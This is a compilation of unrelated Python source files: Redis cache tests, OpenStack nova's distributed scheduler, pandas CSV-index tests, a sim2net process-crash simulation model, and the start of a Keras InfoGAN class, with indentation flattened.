@pytest.fixture
def set_test_namespace(self, redis_cache):
redis_cache.namespace = "test"
yield
redis_cache.namespace = None
def test_name(self):
assert RedisCache.NAME == "redis"
def test_inheritance(self):
assert isinstance(RedisCache(), BaseCache)
def test_default_serializer(self):
assert isinstance(RedisCache().serializer, JsonSerializer)
@pytest.mark.parametrize(
"path,expected", [("", {}), ("/", {}), ("/1", {"db": "1"}), ("/1/2/3", {"db": "1"})]
)
def test_parse_uri_path(self, path, expected):
assert RedisCache().parse_uri_path(path) == expected
@pytest.mark.parametrize(
"namespace, expected",
([None, "test:" + pytest.KEY], ["", pytest.KEY], ["my_ns", "my_ns:" + pytest.KEY]),
)
def test_build_key_double_dot(self, set_test_namespace, redis_cache, namespace, expected):
assert redis_cache.build_key(pytest.KEY, namespace=namespace) == expected
def test_build_key_no_namespace(self, redis_cache):
assert redis_cache.build_key(pytest.KEY, namespace=None) == pytest.KEY
|
|
# Copyright (c) 2011 Openstack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
The DistributedScheduler is for creating instances locally or across zones.
You can customize this scheduler by specifying your own Host Filters and
Weighing Functions.
"""
import json
import operator
import types
import M2Crypto
from nova.compute import api as compute_api
from novaclient import v1_1 as novaclient
from novaclient import exceptions as novaclient_exceptions
from nova import crypto
from nova import db
from nova import exception
from nova import flags
from nova import log as logging
from nova import rpc
from nova.scheduler import api
from nova.scheduler import driver
from nova.scheduler import filters
from nova.scheduler import least_cost
from nova.scheduler import scheduler_options
from nova import utils
FLAGS = flags.FLAGS
flags.DEFINE_list('default_host_filters', ['InstanceTypeFilter'],
'Which filters to use for filtering hosts when not specified '
'in the request.')
LOG = logging.getLogger('nova.scheduler.distributed_scheduler')
class InvalidBlob(exception.NovaException):
message = _("Ill-formed or incorrectly routed 'blob' data sent "
"to instance create request.")
class DistributedScheduler(driver.Scheduler):
"""Scheduler that can work across any nova deployment, from simple
deployments to multiple nested zones.
"""
def __init__(self, *args, **kwargs):
super(DistributedScheduler, self).__init__(*args, **kwargs)
self.cost_function_cache = {}
self.options = scheduler_options.SchedulerOptions()
def schedule(self, context, topic, method, *args, **kwargs):
"""The schedule() contract requires we return the one
best-suited host for this request.
NOTE: We're only focused on compute instances right now,
so this method will always raise NoValidHost()."""
msg = _("No host selection for %s defined.") % topic
raise exception.NoValidHost(reason=msg)
def schedule_run_instance(self, context, request_spec, *args, **kwargs):
"""This method is called from nova.compute.api to provision
an instance. However we need to look at the parameters being
passed in to see if this is a request to:
1. Create build plan (a list of WeightedHosts) and then provision, or
2. Use the WeightedHost information in the request parameters
to simply create the instance (either in this zone or
a child zone).
returns a list of the instances created.
"""
elevated = context.elevated()
num_instances = request_spec.get('num_instances', 1)
LOG.debug(_("Attempting to build %(num_instances)d instance(s)") %
locals())
weighted_hosts = []
# Having a 'blob' hint means we've already provided a build plan.
# We need to turn this back into a WeightedHost object.
blob = request_spec.get('blob', None)
if blob:
weighted_hosts.append(self._make_weighted_host_from_blob(blob))
else:
# No plan ... better make one.
weighted_hosts = self._schedule(elevated, "compute", request_spec,
*args, **kwargs)
if not weighted_hosts:
raise exception.NoValidHost(reason=_(""))
instances = []
for num in xrange(num_instances):
if not weighted_hosts:
break
weighted_host = weighted_hosts.pop(0)
instance = None
if weighted_host.host:
instance = self._provision_resource_locally(elevated,
weighted_host, request_spec, kwargs)
else:
instance = self._ask_child_zone_to_create_instance(elevated,
weighted_host, request_spec, kwargs)
if instance:
instances.append(instance)
return instances
def select(self, context, request_spec, *args, **kwargs):
"""Select returns a list of weights and zone/host information
corresponding to the best hosts to service the request. Any
internal zone information will be encrypted so as not to reveal
anything about our inner layout.
"""
elevated = context.elevated()
weighted_hosts = self._schedule(elevated, "compute", request_spec,
*args, **kwargs)
return [weighted_host.to_dict() for weighted_host in weighted_hosts]
def _call_zone_method(self, context, method, specs, zones):
"""Call novaclient zone method. Broken out for testing."""
return api.call_zone_method(context, method, specs=specs, zones=zones)
def _provision_resource_locally(self, context, weighted_host, request_spec,
kwargs):
"""Create the requested resource in this Zone."""
instance = self.create_instance_db_entry(context, request_spec)
driver.cast_to_compute_host(context, weighted_host.host,
'run_instance', instance_id=instance['id'], **kwargs)
return driver.encode_instance(instance, local=True)
def _make_weighted_host_from_blob(self, blob):
"""Returns the decrypted blob as a WeightedHost object
or None if invalid. Broken out for testing.
"""
decryptor = crypto.decryptor(FLAGS.build_plan_encryption_key)
try:
json_entry = decryptor(blob)
# Extract our WeightedHost values
wh_dict = json.loads(json_entry)
host = wh_dict.get('host', None)
blob = wh_dict.get('blob', None)
zone = wh_dict.get('zone', None)
return least_cost.WeightedHost(wh_dict['weight'],
host=host, blob=blob, zone=zone)
except M2Crypto.EVP.EVPError:
raise InvalidBlob()
def _ask_child_zone_to_create_instance(self, context, weighted_host,
request_spec, kwargs):
"""Once we have determined that the request should go to one
of our children, we need to fabricate a new POST /servers/
call with the same parameters that were passed into us.
This request is always for a single instance.
Note that we have to reverse engineer from our args to get back the
image, flavor, ipgroup, etc. since the original call could have
come in from EC2 (which doesn't use these things).
"""
instance_type = request_spec['instance_type']
instance_properties = request_spec['instance_properties']
name = instance_properties['display_name']
image_ref = instance_properties['image_ref']
meta = instance_properties['metadata']
flavor_id = instance_type['flavorid']
reservation_id = instance_properties['reservation_id']
files = kwargs['injected_files']
zone = db.zone_get(context.elevated(), weighted_host.zone)
zone_name = zone.name
url = zone.api_url
LOG.debug(_("Forwarding instance create call to zone '%(zone_name)s'. "
"ReservationID=%(reservation_id)s") % locals())
nova = None
try:
# This operation is done as the caller, not the zone admin.
nova = novaclient.Client(zone.username, zone.password, None, url,
token=context.auth_token,
region_name=zone_name)
nova.authenticate()
        except novaclient_exceptions.BadRequest as e:
raise exception.NotAuthorized(_("Bad credentials attempting "
"to talk to zone at %(url)s.") % locals())
# NOTE(Vek): Novaclient has two different calling conventions
# for this call, depending on whether you're using
# 1.0 or 1.1 API: in 1.0, there's an ipgroups
# argument after flavor_id which isn't present in
# 1.1. To work around this, all the extra
# arguments are passed as keyword arguments
# (there's a reasonable default for ipgroups in the
# novaclient call).
instance = nova.servers.create(name, image_ref, flavor_id,
meta=meta, files=files,
zone_blob=weighted_host.blob,
reservation_id=reservation_id)
return driver.encode_instance(instance._info, local=False)
def _adjust_child_weights(self, child_results, zones):
"""Apply the Scale and Offset values from the Zone definition
to adjust the weights returned from the child zones. Returns
a list of WeightedHost objects: [WeightedHost(), ...]
"""
weighted_hosts = []
for zone_id, result in child_results:
if not result:
continue
for zone_rec in zones:
if zone_rec['id'] != zone_id:
continue
for item in result:
try:
offset = zone_rec['weight_offset']
scale = zone_rec['weight_scale']
raw_weight = item['weight']
cooked_weight = offset + scale * raw_weight
weighted_hosts.append(least_cost.WeightedHost(
host=None, weight=cooked_weight,
zone=zone_id, blob=item['blob']))
except KeyError:
LOG.exception(_("Bad child zone scaling values "
"for Zone: %(zone_id)s") % locals())
return weighted_hosts
def _zone_get_all(self, context):
"""Broken out for testing."""
return db.zone_get_all(context)
def _get_configuration_options(self):
"""Fetch options dictionary. Broken out for testing."""
return self.options.get_configuration()
def _schedule(self, elevated, topic, request_spec, *args, **kwargs):
"""Returns a list of hosts that meet the required specs,
ordered by their fitness.
"""
if topic != "compute":
msg = _("Scheduler only understands Compute nodes (for now)")
raise NotImplementedError(msg)
instance_type = request_spec.get("instance_type", None)
if not instance_type:
msg = _("Scheduler only understands InstanceType-based" \
"provisioning.")
raise NotImplementedError(msg)
cost_functions = self.get_cost_functions()
ram_requirement_mb = instance_type['memory_mb']
        disk_requirement_gb = instance_type['local_gb']
options = self._get_configuration_options()
# Find our local list of acceptable hosts by repeatedly
# filtering and weighing our options. Each time we choose a
# host, we virtually consume resources on it so subsequent
# selections can adjust accordingly.
# unfiltered_hosts_dict is {host : ZoneManager.HostInfo()}
unfiltered_hosts_dict = self.zone_manager.get_all_host_data(elevated)
unfiltered_hosts = unfiltered_hosts_dict.items()
num_instances = request_spec.get('num_instances', 1)
selected_hosts = []
for num in xrange(num_instances):
# Filter local hosts based on requirements ...
filtered_hosts = self._filter_hosts(topic, request_spec,
unfiltered_hosts, options)
if not filtered_hosts:
# Can't get any more locally.
break
LOG.debug(_("Filtered %(filtered_hosts)s") % locals())
# weighted_host = WeightedHost() ... the best
# host for the job.
weighted_host = least_cost.weighted_sum(cost_functions,
filtered_hosts, options)
LOG.debug(_("Weighted %(weighted_host)s") % locals())
selected_hosts.append(weighted_host)
# Now consume the resources so the filter/weights
# will change for the next instance.
            weighted_host.hostinfo.consume_resources(disk_requirement_gb,
                                                     ram_requirement_mb)
# Next, tack on the host weights from the child zones
json_spec = json.dumps(request_spec)
all_zones = self._zone_get_all(elevated)
child_results = self._call_zone_method(elevated, "select",
specs=json_spec, zones=all_zones)
selected_hosts.extend(self._adjust_child_weights(
child_results, all_zones))
selected_hosts.sort(key=operator.attrgetter('weight'))
return selected_hosts[:num_instances]
def _get_filter_classes(self):
# Imported here to avoid circular imports
from nova.scheduler import filters
def get_itm(nm):
return getattr(filters, nm)
return [get_itm(itm) for itm in dir(filters)
if (type(get_itm(itm)) is types.TypeType)
and issubclass(get_itm(itm), filters.AbstractHostFilter)
and get_itm(itm) is not filters.AbstractHostFilter]
def _choose_host_filters(self, filters=None):
"""Since the caller may specify which filters to use we need
to have an authoritative list of what is permissible. This
function checks the filter names against a predefined set
of acceptable filters.
"""
if not filters:
filters = FLAGS.default_host_filters
if not isinstance(filters, (list, tuple)):
filters = [filters]
good_filters = []
bad_filters = []
filter_classes = self._get_filter_classes()
for filter_name in filters:
found_class = False
for cls in filter_classes:
if cls.__name__ == filter_name:
good_filters.append(cls())
found_class = True
break
if not found_class:
bad_filters.append(filter_name)
if bad_filters:
msg = ", ".join(bad_filters)
raise exception.SchedulerHostFilterNotFound(filter_name=msg)
return good_filters
def _filter_hosts(self, topic, request_spec, hosts, options):
"""Filter the full host list. hosts = [(host, HostInfo()), ...].
This method returns a subset of hosts, in the same format."""
selected_filters = self._choose_host_filters()
# TODO(sandy): We're only using InstanceType-based specs
# currently. Later we'll need to snoop for more detailed
# host filter requests.
instance_type = request_spec.get("instance_type", None)
if instance_type is None:
# No way to select; return the specified hosts.
return hosts
for selected_filter in selected_filters:
query = selected_filter.instance_type_to_filter(instance_type)
hosts = selected_filter.filter_hosts(hosts, query, options)
return hosts
def get_cost_functions(self, topic=None):
"""Returns a list of tuples containing weights and cost functions to
use for weighing hosts
"""
if topic is None:
# Schedulers only support compute right now.
topic = "compute"
if topic in self.cost_function_cache:
return self.cost_function_cache[topic]
cost_fns = []
for cost_fn_str in FLAGS.least_cost_functions:
if '.' in cost_fn_str:
short_name = cost_fn_str.split('.')[-1]
else:
short_name = cost_fn_str
cost_fn_str = "%s.%s.%s" % (
__name__, self.__class__.__name__, short_name)
if not (short_name.startswith('%s_' % topic) or
short_name.startswith('noop')):
continue
try:
# NOTE: import_class is somewhat misnamed since
# the weighing function can be any non-class callable
# (i.e., no 'self')
cost_fn = utils.import_class(cost_fn_str)
except exception.ClassNotFound:
raise exception.SchedulerCostFunctionNotFound(
cost_fn_str=cost_fn_str)
try:
flag_name = "%s_weight" % cost_fn.__name__
weight = getattr(FLAGS, flag_name)
except AttributeError:
raise exception.SchedulerWeightFlagNotFound(
flag_name=flag_name)
cost_fns.append((weight, cost_fn))
self.cost_function_cache[topic] = cost_fns
return cost_fns
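# NOTE(editor): illustrative sketch only, not part of nova. It shows, under
# simplified assumptions, how _adjust_child_weights() cooks a child zone's raw
# weight (cooked_weight = offset + scale * raw_weight) and how _schedule()
# then orders all candidates by weight. _MiniWeightedHost is a hypothetical
# stand-in for least_cost.WeightedHost.
class _MiniWeightedHost(object):
    def __init__(self, weight, host=None, zone=None):
        self.weight = weight
        self.host = host
        self.zone = zone
def _example_adjust_and_sort():
    zone_rec = {'id': 7, 'weight_offset': 10.0, 'weight_scale': 2.0}
    child_items = [{'weight': 1.5, 'blob': 'opaque'},
                   {'weight': 0.5, 'blob': 'opaque'}]
    cooked = [_MiniWeightedHost(zone_rec['weight_offset'] +
                                zone_rec['weight_scale'] * item['weight'],
                                zone=zone_rec['id'])
              for item in child_items]
    local = [_MiniWeightedHost(9.0, host='compute-1')]
    selected = sorted(local + cooked, key=operator.attrgetter('weight'))
    # Yields weights [9.0, 11.0, 13.0]: the local host wins in this example.
    return [(wh.host, wh.zone, wh.weight) for wh in selected]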
|
|
"""
Tests that work on both the Python and C engines but do not have a
specific classification into the other test modules.
"""
from datetime import datetime
from io import StringIO
import os
import pytest
from pandas import (
DataFrame,
Index,
MultiIndex,
)
import pandas._testing as tm
xfail_pyarrow = pytest.mark.usefixtures("pyarrow_xfail")
@pytest.mark.parametrize(
"data,kwargs,expected",
[
(
"""foo,2,3,4,5
bar,7,8,9,10
baz,12,13,14,15
qux,12,13,14,15
foo2,12,13,14,15
bar2,12,13,14,15
""",
{"index_col": 0, "names": ["index", "A", "B", "C", "D"]},
DataFrame(
[
[2, 3, 4, 5],
[7, 8, 9, 10],
[12, 13, 14, 15],
[12, 13, 14, 15],
[12, 13, 14, 15],
[12, 13, 14, 15],
],
index=Index(["foo", "bar", "baz", "qux", "foo2", "bar2"], name="index"),
columns=["A", "B", "C", "D"],
),
),
(
"""foo,one,2,3,4,5
foo,two,7,8,9,10
foo,three,12,13,14,15
bar,one,12,13,14,15
bar,two,12,13,14,15
""",
{"index_col": [0, 1], "names": ["index1", "index2", "A", "B", "C", "D"]},
DataFrame(
[
[2, 3, 4, 5],
[7, 8, 9, 10],
[12, 13, 14, 15],
[12, 13, 14, 15],
[12, 13, 14, 15],
],
index=MultiIndex.from_tuples(
[
("foo", "one"),
("foo", "two"),
("foo", "three"),
("bar", "one"),
("bar", "two"),
],
names=["index1", "index2"],
),
columns=["A", "B", "C", "D"],
),
),
],
)
def test_pass_names_with_index(all_parsers, data, kwargs, expected):
parser = all_parsers
result = parser.read_csv(StringIO(data), **kwargs)
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
@pytest.mark.parametrize("index_col", [[0, 1], [1, 0]])
def test_multi_index_no_level_names(all_parsers, index_col):
data = """index1,index2,A,B,C,D
foo,one,2,3,4,5
foo,two,7,8,9,10
foo,three,12,13,14,15
bar,one,12,13,14,15
bar,two,12,13,14,15
"""
headless_data = "\n".join(data.split("\n")[1:])
names = ["A", "B", "C", "D"]
parser = all_parsers
result = parser.read_csv(
StringIO(headless_data), index_col=index_col, header=None, names=names
)
expected = parser.read_csv(StringIO(data), index_col=index_col)
# No index names in headless data.
expected.index.names = [None] * 2
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
def test_multi_index_no_level_names_implicit(all_parsers):
parser = all_parsers
data = """A,B,C,D
foo,one,2,3,4,5
foo,two,7,8,9,10
foo,three,12,13,14,15
bar,one,12,13,14,15
bar,two,12,13,14,15
"""
result = parser.read_csv(StringIO(data))
expected = DataFrame(
[
[2, 3, 4, 5],
[7, 8, 9, 10],
[12, 13, 14, 15],
[12, 13, 14, 15],
[12, 13, 14, 15],
],
columns=["A", "B", "C", "D"],
index=MultiIndex.from_tuples(
[
("foo", "one"),
("foo", "two"),
("foo", "three"),
("bar", "one"),
("bar", "two"),
]
),
)
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
@pytest.mark.parametrize(
"data,expected,header",
[
("a,b", DataFrame(columns=["a", "b"]), [0]),
(
"a,b\nc,d",
DataFrame(columns=MultiIndex.from_tuples([("a", "c"), ("b", "d")])),
[0, 1],
),
],
)
@pytest.mark.parametrize("round_trip", [True, False])
def test_multi_index_blank_df(all_parsers, data, expected, header, round_trip):
# see gh-14545
parser = all_parsers
data = expected.to_csv(index=False) if round_trip else data
result = parser.read_csv(StringIO(data), header=header)
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
def test_no_unnamed_index(all_parsers):
parser = all_parsers
data = """ id c0 c1 c2
0 1 0 a b
1 2 0 c d
2 2 2 e f
"""
result = parser.read_csv(StringIO(data), sep=" ")
expected = DataFrame(
[[0, 1, 0, "a", "b"], [1, 2, 0, "c", "d"], [2, 2, 2, "e", "f"]],
columns=["Unnamed: 0", "id", "c0", "c1", "c2"],
)
tm.assert_frame_equal(result, expected)
def test_read_duplicate_index_explicit(all_parsers):
data = """index,A,B,C,D
foo,2,3,4,5
bar,7,8,9,10
baz,12,13,14,15
qux,12,13,14,15
foo,12,13,14,15
bar,12,13,14,15
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), index_col=0)
expected = DataFrame(
[
[2, 3, 4, 5],
[7, 8, 9, 10],
[12, 13, 14, 15],
[12, 13, 14, 15],
[12, 13, 14, 15],
[12, 13, 14, 15],
],
columns=["A", "B", "C", "D"],
index=Index(["foo", "bar", "baz", "qux", "foo", "bar"], name="index"),
)
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
def test_read_duplicate_index_implicit(all_parsers):
data = """A,B,C,D
foo,2,3,4,5
bar,7,8,9,10
baz,12,13,14,15
qux,12,13,14,15
foo,12,13,14,15
bar,12,13,14,15
"""
parser = all_parsers
result = parser.read_csv(StringIO(data))
expected = DataFrame(
[
[2, 3, 4, 5],
[7, 8, 9, 10],
[12, 13, 14, 15],
[12, 13, 14, 15],
[12, 13, 14, 15],
[12, 13, 14, 15],
],
columns=["A", "B", "C", "D"],
index=Index(["foo", "bar", "baz", "qux", "foo", "bar"]),
)
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
def test_read_csv_no_index_name(all_parsers, csv_dir_path):
parser = all_parsers
csv2 = os.path.join(csv_dir_path, "test2.csv")
result = parser.read_csv(csv2, index_col=0, parse_dates=True)
expected = DataFrame(
[
[0.980269, 3.685731, -0.364216805298, -1.159738, "foo"],
[1.047916, -0.041232, -0.16181208307, 0.212549, "bar"],
[0.498581, 0.731168, -0.537677223318, 1.346270, "baz"],
[1.120202, 1.567621, 0.00364077397681, 0.675253, "qux"],
[-0.487094, 0.571455, -1.6116394093, 0.103469, "foo2"],
],
columns=["A", "B", "C", "D", "E"],
index=Index(
[
datetime(2000, 1, 3),
datetime(2000, 1, 4),
datetime(2000, 1, 5),
datetime(2000, 1, 6),
datetime(2000, 1, 7),
]
),
)
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
def test_empty_with_index(all_parsers):
# see gh-10184
data = "x,y"
parser = all_parsers
result = parser.read_csv(StringIO(data), index_col=0)
expected = DataFrame(columns=["y"], index=Index([], name="x"))
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
def test_empty_with_multi_index(all_parsers):
# see gh-10467
data = "x,y,z"
parser = all_parsers
result = parser.read_csv(StringIO(data), index_col=["x", "y"])
expected = DataFrame(
columns=["z"], index=MultiIndex.from_arrays([[]] * 2, names=["x", "y"])
)
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
def test_empty_with_reversed_multi_index(all_parsers):
data = "x,y,z"
parser = all_parsers
result = parser.read_csv(StringIO(data), index_col=[1, 0])
expected = DataFrame(
columns=["z"], index=MultiIndex.from_arrays([[]] * 2, names=["y", "x"])
)
tm.assert_frame_equal(result, expected)
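# NOTE(editor): minimal standalone illustration, not an actual parametrized
# test case. It shows the index_col/names interplay exercised above: when
# "names" includes the index column and the data has no header row, passing
# index_col promotes that column to the frame's index. The helper name is
# hypothetical.
def _illustrate_index_col_with_names():
    from pandas import read_csv
    data = "foo,1,2\nbar,3,4\n"
    expected = DataFrame([[1, 2], [3, 4]],
                         index=Index(["foo", "bar"], name="idx"),
                         columns=["A", "B"])
    result = read_csv(StringIO(data), index_col=0, names=["idx", "A", "B"])
    tm.assert_frame_equal(result, expected)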
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# (c) 2012-2013 Michal Kalewski <mkalewski at cs.put.poznan.pl>
#
# This file is a part of the Simple Network Simulator (sim2net) project.
# USE, MODIFICATION, COPYING AND DISTRIBUTION OF THIS SOFTWARE IS SUBJECT TO
# THE TERMS AND CONDITIONS OF THE MIT LICENSE. YOU SHOULD HAVE RECEIVED A COPY
# OF THE MIT LICENSE ALONG WITH THIS SOFTWARE; IF NOT, YOU CAN DOWNLOAD A COPY
# FROM HTTP://WWW.OPENSOURCE.ORG/.
#
# For bug reports, feature and support requests please visit
# <https://github.com/mkalewski/sim2net/issues>.
"""
This module provides an implementation of the crash model.
In the crash model ([CGR11]_), processes may at some time simply stop executing
steps, and once this happens, the faulty processes never recover.
In this implementation, a failure for each process is determined randomly with
the use of the given *crash probability* that indicates the probability that a
process will crash during the total simulation time. By the method used, times
at which processes crash will be distributed uniformly in the total simulation
time. There is also a possibility to set up a *transient period* (at the
beginning of the simulation), during which process failures do not occur, and
the total number of faulty processes can also be limited to a given value.
"""
import operator
from sim2net.failure._failure import Failure
from sim2net.utility.validation import check_argument_type
__docformat__ = 'reStructuredText'
#pylint: disable=R0913
class Crash(Failure):
"""
This class implements the process crash model.
.. note::
It is presumed that the :meth:`node_failure` method is called at each
step of the simulation.
"""
def __init__(self, time, nodes_number, crash_probability,
maximum_crash_number, total_simulation_steps,
transient_steps=0):
"""
*Parameters*:
- **time**: a simulation time object of the
:class:`sim2net._time.Time` class;
- **nodes_number** (`int`): the total number of nodes in the
simulated network;
- **crash_probability** (`float`): the probability that a single
process will crash during the total simulation time;
- **maximum_crash_number** (`int`): the maximum number of faulty
processes;
- **total_simulation_steps** (`int`): the total number of
simulation steps;
- **transient_steps** (`int`): a number of steps at the beginning
of the simulation during which no crashes occur (default: `0`).
*Raises*:
- **ValueError**: raised when the given value of the *time* object
is `None`; or when the given number of nodes is less than or
equal to zero; or when the given crash probability is less than
            zero or greater than one; or when the given value of the maximum
number of faulty processes or the given value of the total
simulation steps is less than zero; or when the number of steps
in the transient period is less than zero or greater than the
given value of the total simulation steps.
"""
super(Crash, self).__init__(Crash.__name__)
if time is None:
raise ValueError('Parameter "time": a time abstraction object'
' expected but "None" value given!')
check_argument_type(Crash.__name__, 'nodes_number', int, nodes_number,
self.logger)
if nodes_number <= 0:
raise ValueError('Parameter "nodes_number": the number of nodes'
' cannot be less or equal to zero but %d given!'
% int(nodes_number))
check_argument_type(Crash.__name__, 'crash_probability', float,
crash_probability, self.logger)
if crash_probability < 0.0 or crash_probability > 1.0:
raise ValueError('Parameter "crash_probability": a value of the'
' crash probability parameter cannot be less'
' than zero and greater than one but %f given!'
% float(crash_probability))
check_argument_type(Crash.__name__, 'maximum_crash_number', int,
maximum_crash_number, self.logger)
if maximum_crash_number < 0:
raise ValueError('Parameter "maximum_crash_number": a value of'
' the maximum number of crashes cannot be less'
' than zero but %d given!'
% int(maximum_crash_number))
check_argument_type(Crash.__name__, 'total_simulation_steps', int,
total_simulation_steps, self.logger)
if total_simulation_steps < 0:
raise ValueError('Parameter "total_simulation_steps": a value of'
' the total number of simulation steps cannot be'
' less than zero but %d given!'
% int(total_simulation_steps))
check_argument_type(Crash.__name__, 'transient_steps', int,
transient_steps, self.logger)
if transient_steps < 0 or transient_steps > total_simulation_steps:
raise ValueError('Parameter "transient_steps": a number of the'
' transient steps cannot be less than zero or'
' greater than the total number of simulation'
' steps but %d given!' % int(transient_steps))
self.__time = time
self.__crashed = \
self.__crashes(int(nodes_number),
float(crash_probability), int(maximum_crash_number),
int(total_simulation_steps), int(transient_steps))
def __crashes(self, nodes_number, crash_probability, maximum_crash_number,
total_simulation_steps, transient_steps):
"""
Determines faulty processes and their times of crash with the use of
the given *crash probability*. There is also a possibility to setup a
transient period (at the beginning of the simulation), during which
process failures do not occur, and the total number of faulty processes
can also be limited to a given value.
*Parameters*:
- **nodes_number** (`int`): the total number of nodes in the
simulated network;
- **crash_probability** (`float`): the probability that a single
process will crash during the total simulation time;
- **maximum_crash_number** (`int`): the maximum number of faulty
processes;
- **total_simulation_steps** (`int`): the total number of
simulation steps;
- **transient_steps** (`int`): a number of steps at the beginning
of the simulation during which no crashes occur (default: `0`).
*Returns*:
            A `list` of `tuples`; each tuple contains an identifier of a node
            with a faulty process and its time of crash (in simulation steps).
            The list is sorted in ascending order by crash times.
"""
if maximum_crash_number == 0:
return []
crashes = [-1] * nodes_number
crashes_number = 0
for node_id in xrange(nodes_number):
crash = self.random_generator.uniform(0.0, 1.0)
if crash <= crash_probability:
crashes[node_id] = \
self.random_generator.uniform(0.0 + transient_steps,
total_simulation_steps)
crashes_number = crashes_number + 1
if crashes_number == maximum_crash_number:
break
self.random_generator.random_order(crashes)
crashed = dict()
for node_id in xrange(nodes_number):
if crashes[node_id] > 0:
crashed[node_id] = int(crashes[node_id])
assert len(crashed) <= maximum_crash_number, \
            'The number of faulty processes (%d) is greater than the maximum' \
            ' value (%d)!' % (len(crashed), maximum_crash_number)
return sorted(crashed.iteritems(), key=operator.itemgetter(1))
def node_failure(self, failures):
"""
        Gives *in place* information about nodes whose processes have failed
        according to the crash model.
*Parameters*:
- **failures** (`list`): a list of boolean values of the size equal
to the total number of nodes in the simulated network; `True`
value in position :math:`i` indicates that the process on node
number :math:`i` has failed.
*Returns*"
A `list` of nodes which processes failed at the current simulation
step.
*Examples*:
In order to avoid any process failures use this class with the
*crash_probability* and/or *maximum_crash_number* parameters set to
`0`, as in the examples below.
.. testsetup::
from sim2net._time import Time
from sim2net.failure.crash import Crash
.. doctest::
>>> clock = Time()
>>> clock.setup()
>>> crash = Crash(clock, 4, 0.0, 0, 2)
>>> failures = [False, False, False, False]
>>> clock.tick()
(0, 0.0)
>>> crash.node_failure(failures)
[]
>>> print failures
[False, False, False, False]
>>> clock.tick()
(1, 1.0)
>>> crash.node_failure(failures)
[]
>>> print failures
[False, False, False, False]
>>> clock = Time()
>>> clock.setup()
>>> crash = Crash(clock, 4, 1.0, 0, 2)
>>> failures = [False, False, False, False]
>>> clock.tick()
(0, 0.0)
>>> crash.node_failure(failures)
[]
>>> print failures
[False, False, False, False]
>>> clock.tick()
(1, 1.0)
>>> crash.node_failure(failures)
[]
>>> print failures
[False, False, False, False]
"""
crashes = list()
while self.__crashed:
if self.__crashed[0][1] <= self.__time.simulation_step:
failures[self.__crashed[0][0]] = True
crashes.append(self.__crashed[0][0])
self.logger.debug('In accordance with the node failure model'
' node #%d has failed'
% self.__crashed[0][0])
self.__crashed.pop(0)
else:
break
return crashes
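# NOTE(editor): standalone sketch, not part of sim2net. It mirrors the idea of
# Crash.__crashes() under simplified assumptions: each node crashes with the
# given probability, crash times are drawn uniformly after the transient
# period, the number of crashes is capped, and the schedule is sorted by crash
# time. The standard "random" module replaces the project's random generator.
def _example_crash_schedule(nodes_number, crash_probability,
                            maximum_crash_number, total_simulation_steps,
                            transient_steps=0, seed=0):
    import random
    rng = random.Random(seed)
    crashed = {}
    for node_id in xrange(nodes_number):
        if len(crashed) == maximum_crash_number:
            break
        if rng.uniform(0.0, 1.0) <= crash_probability:
            crashed[node_id] = int(rng.uniform(transient_steps,
                                               total_simulation_steps))
    return sorted(crashed.items(), key=operator.itemgetter(1))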
|
|
import numpy as np
import keras.backend as K
from keras.activations import linear
from keras.models import Model as K_Model
from keras.layers import Input, Activation, TimeDistributed, Dense
from keras.optimizers import Adam
from keras.layers.core import Lambda
from keras.layers.merge import Concatenate
from learn.models.interfaces import Model, InfoganPrior, InfoganGenerator, InfoganDiscriminator, \
InfoganEncoder
class InfoGAN2(Model):
"""
Puts together different networks to form the InfoGAN network as per:
"InfoGAN: Interpretable Representation Learning by Information Maximizing Generative Adversarial
Nets" by Xi Chen, Yan Duan, Rein Houthooft, John Schulman, Ilya Sutskever, Pieter Abbeel
"""
def __init__(self,
batch_size,
data_shape,
prior,
generator,
shared_net,
discriminator,
encoder,
recurrent_dim):
"""__init__
:param batch_size - number of real samples passed at each iteration
:param data_shape - e.g. (img_height, img_width, n_chan), shape of generated images
:param prior - where the latents in infogan are sampled from
:param generator - G model
:param shared_net - network model shared between E and D
:param discriminator - D model
:param encoder - E model
:param recurrent_dim - set to None if data is not recurrent
"""
self.batch_size = batch_size
self.data_shape = data_shape
self.prior = prior
self.generator = generator
self.shared_net = shared_net
self.discriminator = discriminator
self.encoder = encoder
self.recurrent_dim = recurrent_dim
if self.recurrent_dim:
self.shape_prefix = (self.recurrent_dim, )
else:
self.shape_prefix = ()
# PUTTING IT TOGETHER
self.sampled_latents, self.prior_param_inputs = self.prior.sample()
self.generated = self.generator.generate(self.sampled_latents)
self.real_input = Input(shape=self.shape_prefix + self.data_shape,
name="real_data_input")
self.real_labels = encoder.get_labels_input()
shared_gen = self.shared_net.apply(self.generated)
shared_real = self.shared_net.apply(self.real_input)
self.gen_encodings = self.encoder.encode(shared_gen)
mi_losses, E_gen_loss_outputs = self.encoder.get_mi_loss(self.sampled_latents,
self.gen_encodings)
self.real_encodings = self.encoder.encode(shared_real)
# this can be empty if the encoder is not supervised
sup_losses, E_real_loss_outputs = self.encoder.get_supervised_loss(self.real_labels,
self.real_encodings)
enc_losses = merge_dicts(mi_losses, sup_losses)
self.disc_real = self.discriminator.discriminate(shared_real)
self.disc_gen = self.discriminator.discriminate(shared_gen)
disc_losses, D_loss_outputs = self.discriminator.get_loss(
self.disc_real, self.disc_gen)
# DISCRIMINATOR TRAINING MODEL
self.generator.freeze()
disc_train_inputs = [self.real_input]
if self.encoder.supervised_dist:
disc_train_inputs.append(self.real_labels)
disc_train_inputs += self.prior_param_inputs
disc_train_outputs = D_loss_outputs + E_real_loss_outputs + E_gen_loss_outputs
self.disc_train_model = K_Model(inputs=disc_train_inputs,
outputs=disc_train_outputs,
name="disc_train_model")
